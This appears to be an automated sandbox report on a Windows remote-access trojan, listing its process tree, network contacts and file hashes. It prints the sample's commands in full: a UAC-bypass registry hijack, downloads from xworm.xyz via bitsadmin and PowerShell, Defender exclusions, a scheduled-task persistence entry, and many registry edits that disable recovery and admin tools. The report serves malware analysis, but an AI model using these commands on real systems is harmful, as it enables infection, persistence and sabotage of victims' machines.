Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat"
C:\Windows\system32\certutil.exe
certutil -decodehex temp.hex "Uni.exe"
C:\Users\Admin\AppData\Local\Temp\Uni.exe
Uni.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Uni.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe
"C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAagBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AbgB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAZgBmACMAPgA="
C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe
"C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\reset survival.bat" "
C:\Windows\SysWOW64\ReAgentc.exe
reagentc /disable
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsSetupOptions" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d 0 /f
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCPL" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoThemesTab" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoDispSettings" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 2 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\WinRE" /v "DisableStatusMessages" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "\Microsoft\Windows\WinRE\WinREBootIndex" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "\Microsoft\Windows\WinRE\WinRECleanup" /Disable
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\sr" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\sc.exe
sc config wercplsupport start=disabled
C:\Windows\SysWOW64\sc.exe
sc config WerSvc start=disabled
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xworm.xyz | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 147.185.221.18:59571 | las-protected.gl.at.ply.gg | tcp |
Files
memory/3876-0-0x00007FFB7DB83000-0x00007FFB7DB85000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_euky0onc.3of.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3876-9-0x00000210DDB80000-0x00000210DDBA2000-memory.dmp
memory/3876-10-0x00007FFB7DB80000-0x00007FFB7E642000-memory.dmp
memory/3876-11-0x00007FFB7DB80000-0x00007FFB7E642000-memory.dmp
memory/3876-12-0x00007FFB7DB80000-0x00007FFB7E642000-memory.dmp
memory/3876-16-0x00007FFB7DB80000-0x00007FFB7E642000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat
| MD5 | 011e90b162cf67f34f91d6d563859817 |
| SHA1 | 30ce18995be9545ae88189bc3ff5defbd2392d11 |
| SHA256 | 6cced62e6af36a52c48fdf0efb1571a44d6469f4ca66ca510020e5da407ed613 |
| SHA512 | 51d47a852b27540154c8b3ccb295dae4874475bf631be931bf8a4cf271805e927162c7f01e8df7f0aea8b9a860dac3500e59208cb60440bfa8e827325be7a36d |
C:\Users\Admin\AppData\Local\Temp\temp.hex
| MD5 | fad3aaf3015914e834a9d0313fcd371b |
| SHA1 | a4715a153a79263436819905b87b54acae4b2227 |
| SHA256 | 917674ca36b5345dccd41f4ce772c6ffe8c3054520ebd2923fba768cbee77690 |
| SHA512 | 64c9bd116ad70abf9e8bf444f248915383d4b4680de1f6dadad649e0279803c9575952b0e1995a34e47c5a73eb42e23e964437a4a7828d3214f3f694383db83a |
C:\Users\Admin\AppData\Local\Temp\Uni.exe
| MD5 | 09e870076cfaa16f20be5050834ba8ff |
| SHA1 | 0b8b26cdaf08a07b8e86b1643ca23e249c8f3840 |
| SHA256 | f3fcb094f57ddd9e4c29eccc62e3ad3ce50d40230fbe0f00324ccf18acd68bc4 |
| SHA512 | d655030bf9bb84ecdd7109aab55c33976e2a2cbd63ccece48d3e881b1dd378e4e17f157a3dd9a07e8786650cbf46b8d742a115cb9906c9b69d7143c2b4de0643 |
memory/564-24-0x0000000000530000-0x0000000000540000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d405540758f0f5bdaab94f1a054cc67d |
| SHA1 | 07e307420a26d17c2dc1226af6e72018da4ae26c |
| SHA256 | 2ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61 |
| SHA512 | 59496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ac62bf271b94b583bcf13eef6b124fee |
| SHA1 | 7fc6c2f61155471eaaadb7da29579eb0958de3df |
| SHA256 | 8ab85c280555d6f378573edba932182d36a89f2bff7762dea01416480b2ac8f4 |
| SHA512 | 7ac0a424cce85734da99afd0019d85cc12c5b77cde32a6b51e1025bf7521c7be4332850d9f6ed6035c8de09c138687b5f8b8897230c5b06ab6c1bef640155ba7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cef328ddb1ee8916e7a658919323edd8 |
| SHA1 | a676234d426917535e174f85eabe4ef8b88256a5 |
| SHA256 | a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90 |
| SHA512 | 747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5794c1baef4c234203656fbbc884eee4 |
| SHA1 | b41df301d53ebe67c5027ee2e7d9cea828790f05 |
| SHA256 | 7b700c984d5eec7c786dc348c669fc480f91f598fa193d1eabc398b200b2d818 |
| SHA512 | 805382583ccf14e6b29584d5a813705615095723485137ed6bc618acbed07b08fb043c1b925c98d7ecd4519515d622fa0122d4f23f7f3031117437cdc676579d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.exe.log
| MD5 | 2cbbb74b7da1f720b48ed31085cbd5b8 |
| SHA1 | 79caa9a3ea8abe1b9c4326c3633da64a5f724964 |
| SHA256 | e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3 |
| SHA512 | ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9 |
C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe
| MD5 | 2841cd968c72817f9eef3a4bc2293d6e |
| SHA1 | 5b788259d501493a87f00deee64fa0943ab19e34 |
| SHA256 | e5a9784f523a6965622532199a42f696ca15557b473f84c12f18210085a20e95 |
| SHA512 | 82eded2b67775763669452be98f7c5eeb0a3cd34f4947753fef9cedea4a1f56b49223ed7ad8e68b77e54ab2bf004e9ba22107afdc23e2e168dc60f2013907bf0 |
C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe
| MD5 | 1d62aa3d19462f3d5575fc54159911b4 |
| SHA1 | b37eab86c0075245fcc517a280f0705f6dffb852 |
| SHA256 | 6acaae0fb470790102a338e23dfe2263f31e529288e4efe51b34bca30371cb36 |
| SHA512 | 78a9501d7920920577a586396e5d9e2278a7c926448c9a98d7844db9032dbd887df90d2f389fe1754bf5a2071a19dfd5d40315624923e903ef9ef6cbb214b1df |
C:\Users\Admin\AppData\Local\Temp\reset survival.bat
| MD5 | ecde221cbc92ee55ae5b8c1a24e98f56 |
| SHA1 | ebda0dba4abcd3bf93183e2787cc9e5f9f1448ee |
| SHA256 | b6fbab33e31d0a525d4c752886d812c1c46477f6314da7bde25bdc8198cb70cb |
| SHA512 | 122673ad96f1e407c75a93672f6538f342499f4e14221cbe4103c601362667487f3f33800230572e255b55e691e5068adce6336a4ffe1a651bff465d2c2d3493 |
memory/3212-98-0x00000000030E0000-0x0000000003116000-memory.dmp
memory/3212-99-0x0000000005DA0000-0x00000000063CA000-memory.dmp
memory/3212-101-0x0000000005B80000-0x0000000005BA2000-memory.dmp
memory/3212-106-0x0000000006440000-0x00000000064A6000-memory.dmp
memory/3212-105-0x0000000005CE0000-0x0000000005D46000-memory.dmp
memory/3212-115-0x00000000064C0000-0x0000000006817000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 050567a067ffea4eb40fe2eefebdc1ee |
| SHA1 | 6e1fb2c7a7976e0724c532449e97722787a00fec |
| SHA256 | 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e |
| SHA512 | 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259 |
memory/3212-118-0x0000000006920000-0x000000000693E000-memory.dmp
memory/3212-119-0x0000000006950000-0x000000000699C000-memory.dmp
memory/3212-120-0x0000000007900000-0x0000000007934000-memory.dmp
memory/3212-121-0x0000000075000000-0x000000007504C000-memory.dmp
memory/3212-130-0x0000000006EF0000-0x0000000006F0E000-memory.dmp
memory/3212-131-0x0000000007940000-0x00000000079E4000-memory.dmp
memory/3212-132-0x00000000082A0000-0x000000000891A000-memory.dmp
memory/3212-133-0x0000000007C60000-0x0000000007C7A000-memory.dmp
memory/3212-134-0x0000000007CF0000-0x0000000007CFA000-memory.dmp
memory/3212-135-0x0000000007EF0000-0x0000000007F86000-memory.dmp
memory/3212-136-0x0000000007E70000-0x0000000007E81000-memory.dmp
memory/3212-137-0x0000000007EB0000-0x0000000007EBE000-memory.dmp
memory/3212-138-0x0000000007EC0000-0x0000000007ED5000-memory.dmp
memory/3212-139-0x0000000007FB0000-0x0000000007FCA000-memory.dmp
memory/3212-140-0x0000000007FA0000-0x0000000007FA8000-memory.dmp